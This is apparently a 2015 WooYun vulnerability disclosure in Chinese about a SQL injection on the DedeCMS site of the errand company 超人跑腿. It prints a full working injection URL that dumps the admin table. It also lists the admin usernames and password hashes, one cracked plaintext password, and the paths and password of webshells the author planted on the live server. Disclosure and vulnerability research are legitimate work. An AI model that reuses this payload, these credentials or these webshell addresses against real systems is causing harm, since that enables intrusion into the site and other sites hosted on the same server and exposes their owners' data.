漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0152827
漏洞标题:超人跑腿主站SQL注入可shell(已进后台)
相关厂商:超人跑腿
漏洞作者: system-admin
提交时间:2015-11-10 13:46
修复时间:2015-12-25 13:48
公开时间:2015-12-25 13:48
漏洞类型:SQL注射漏洞
危害等级:低
自评Rank:1
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-11-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-25: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
下楼时在楼下遇到“超人跑腿”一快递员并递给我一个宣传卡片,卡片上有个网址www.chaorenpaotui.cn,回家看了下是dedecms站,用一个都知道的注入并拿webshell,并发现这台服务器没有对各个站点的目录做访问限制
详细说明:
http://www.chaorenpaotui.cn/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char%28@%60%27%60%29+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat%280x3C6162633E,group_concat%280x7C,userid,0x3a,pwd,0x7C%29,0x3C2F6162633E%29,5,6,7,8,9%20from%20%60%23@__admin%60%23";
得到网站管理员账户
admin:7c6ff7a20019e54878e0
chaorenpaotui:3a5fdc8a052a2441e51e
解出账户admin密码1478963258,登入默认后台通过
通过自带的文件管理器新建webshell,地址http://www.chaorenpaotui.cn/uploads/allimg/131111/1-131111202436464.php,密码chaoren
可以查看同服务器其它站点的目录
没能拿到服务器权限
漏洞证明:
webshell: http://www.chaorenpaotui.cn/wooyun.php
修复方案:
超人跑腿:后台有提示,按提示改就可以了
服务器管理员:设一下目录访问权限
版权声明:转载请注明来源 system-admin@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝